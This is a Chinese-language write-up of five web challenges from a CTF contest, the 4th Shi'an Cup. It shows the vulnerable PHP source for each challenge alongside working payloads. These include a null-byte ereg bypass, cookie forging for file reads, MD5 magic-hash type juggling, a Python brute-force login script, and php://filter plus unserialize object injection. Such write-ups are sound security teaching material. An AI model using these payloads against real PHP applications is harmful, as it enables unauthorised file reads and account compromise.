第四届世安杯writeup-web

发表于 | 分类于 | | 阅读次数:

WEB题部分

1.CTF入门级题目

题目给出源码,下载下来

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
<?php
$flag = '*********';
if (isset ($_GET['password'])) {
    if (ereg ("^[a-zA-Z0-9]+$", $_GET['password']) === FALSE)
        echo '<p class="alert">You password must be alphanumeric</p>';
    else if (strpos ($_GET['password'], '--') !== FALSE)
        die($flag);
    else
        echo '<p class="alert">Invalid password</p>';
}
?>
<section class="login">
        <div class="title">
                <a href="./index.phps">View Source</a>
        </div>
        <form method="POST">
                <input type="text" required name="password" placeholder="Password" /><br/>
                <input type="submit"/>
        </form>
</section>
</body>
</html>

使用%00截断ereg函数,同时不影响strpos函数

1
http://ctf1.shiyanbar.com/shian-rao/index.php?password=123%00--

得到flag
图片1.png

2.曲奇

http://ctf1.shiyanbar.com/shian-quqi/index.php?line=&file=a2V5LnR4dA==
其中有两个参数 line 和 file ,可以发现file参数后的值经过了base64编码,解码后发现是key.txt。尝试修改line的值,但是没有东西显示,于是开始修改file的参数为index.php 的base64编码,通过更改line的值逐行读出源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
error_reporting(0);
$file=base64_decode(isset($_GET['file'])?$_GET['file']:"");
$line=isset($_GET['line'])?intval($_GET['line']):0;
if($file=='') header("location:index.php?line=&file=a2V5LnR4dA==");
$file_list = array(
'0' =>'key.txt',
'1' =>'index.php',
);
if(isset($_COOKIE['key']) && $_COOKIE['key']=='li_lr_480'){
$file_list[2]='thisis_flag.php';
}
if(in_array($file, $file_list)){
$fa = file($file);
echo $fa[$line];
}
?>

得知当cookie的值等于li_lr_480可以访问thisis_flag.php,于是修改file的值为thisis_flag.php的base64编码,并修改cookie的值,访问后直接爆出flag
图片2.png

3.类型

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
<?php
show_source(__FILE__);
$a=0;
$b=0;
$c=0;
$d=0;
if (isset($_GET['x1']))
{
        $x1 = $_GET['x1'];
        $x1=="1"?die("ha?"):NULL;
        switch ($x1)
        {
        case 0:
        case 1:
                $a=1;
                break;
        }
}
$x2=(array)json_decode(@$_GET['x2']);
if(is_array($x2)){
    is_numeric(@$x2["x21"])?die("ha?"):NULL;
    if(@$x2["x21"]){
        ($x2["x21"]>2017)?$b=1:NULL;
    }
    if(is_array(@$x2["x22"])){
        if(count($x2["x22"])!==2 OR !is_array($x2["x22"][0])) die("ha?");
        $p = array_search("XIPU", $x2["x22"]);
        $p===false?die("ha?"):NULL;
        foreach($x2["x22"] as $key=>$val){
            $val==="XIPU"?die("ha?"):NULL;
        }
        $c=1;
}
}
$x3 = $_GET['x3'];
if ($x3 != '15562') {
    if (strstr($x3, 'XIPU')) {
        if (substr(md5($x3),8,16) == substr(md5('15562'),8,16)) {
            $d=1;
        }
    }
}
if($a && $b && $c && $d){
    include "flag.php";
    echo $flag;
}
?>

直接看源码,x1 可以等于任意字符串,x2[x21]为任意数组,x2[x22]长度为2,第一个元素为数组,第二个元素为0.
x3的为比较md5的值,查看15562的md5码第八位至二十四位发现位0e+数字的组合,0e在比较的时候会将其视作为科学计数法,所以无论0e后面是什么,0的多少次方还是0,所以py爆破一波。

1
2
3
4
5
6
7
8
9
10
11
import hashlib
def crack():
    a1 = 1
    while 1:
        a2="XIPU"+str(a1)
        smd5 = hashlib.md5(a2).hexdigest()
        if ("0e" in smd5[8:10]):
            if smd5[10:24].isdigit():
                print a2 + "  " +smd5
        a1 += 1
crack()

部分符合条件的字符串及MD5

1
2
3
4
5
6
7
8
9
XIPU18570  026cba5c0e20905432015695e9eb13ba
XIPU147389  bb3300470e307795644787782e2e7bf2
XIPU150292  34e905dd0e78555952191976ee5d0596
XIPU313592  defe9f960e3597811193469169f82606
XIPU510852  7711559b0e8357069621509019670050
XIPU573493  a50c25840e441898552621207e1c227d
XIPU588288  989cc9b20e46969007951577167c1e6c
XIPU596657  f6aebdca0e259354386697922d607514
XIPU637757  d4a72d140e25939982557071917ec8d1

构造payload

1
http://ctf1.shiyanbar.com/shian-leixing/index.php?x1=abc&x2={"x21":[15],"x22":[[15],0]}&x3=XIPU18570

4.登录

1
http://ctf1.shiyanbar.com/shian-s/index.php?username=admin&password=00000&randcode=315

提示是密码是一个五位数字,同时存在验证码,py一波

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
import re
import requests
se = requests.session()
for pwd in range(0,100000):
    html = se.get("http://ctf1.shiyanbar.com/shian-s").content
    pattern = re.compile(r"(?<=<br><br>).*(?=<br><br>)")
    num = re.findall(pattern,html)[0]
    pwd = str(pwd).zfill
    flagstr = "http://ctf1.shiyanbar.com/shian-s/index.php?username=admin&password=" + pwd  +"&randcode=" + num
    flag = se.get(flagstr).content
    if "flag{" in flag:
        print
        print 'password :' +pwd
        break
    else:
        print pwd

爆破出密码 00315,登录即送flag
flag.png

5.Admin

阅读一下源码
图片3.png

构造php封装协议 php://input 成功绕过第一步过滤
图片4.png

然后构造php://filter 输出base64编码的文件

1
http://ctf1.shiyanbar.com/shian-du/index?user=php://input&file=php://filter/convert.base64_encode/resource=index.php&pass=1

将输出的index.php 解码得到

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
<?php
$user = $_GET["user"];
$file = $_GET["file"];
$pass = $_GET["pass"];
if(isset($user)&&(file_get_contents($user,'r')==="the user is admin")){
    echo "hello admin!<br>";
    if(preg_match("/f1a9/",$file)){
        exit();
    }else{
        include($file); //class.php
        $pass = unserialize($pass);
        echo $pass;
    }
}else{
    echo "you are not admin ! ";
}
?>
<!--
$user = $_GET["user"];
$file = $_GET["file"];
$pass = $_GET["pass"];
if(isset($user)&&(file_get_contents($user,'r')==="the user is admin")){
    echo "hello admin!<br>";
    include($file); //class.php
}else{
    echo "you are not admin ! ";
}

接着读取class.php,解码得

1
2
3
4
5
6
7
8
9
10
11
<?php
class Read{//f1a9.php
    public $file;
    public function __toString(){
        if(isset($this->file)){
            echo file_get_contents($this->file);    
        }
        return "__toString was called!";
    }
}

构造php反序列化读取fla9.php文件

1
http://ctf1.shiyanbar.com/shian-du/index?user=php://input&file=class.php&pass=O:4:"Read":1:{s:4:"file";s:57:"php://filter/read=convert.base64-encode/resource=f1a9.php";}

通过php反序列化漏洞,调用Read函数输出f1a9.php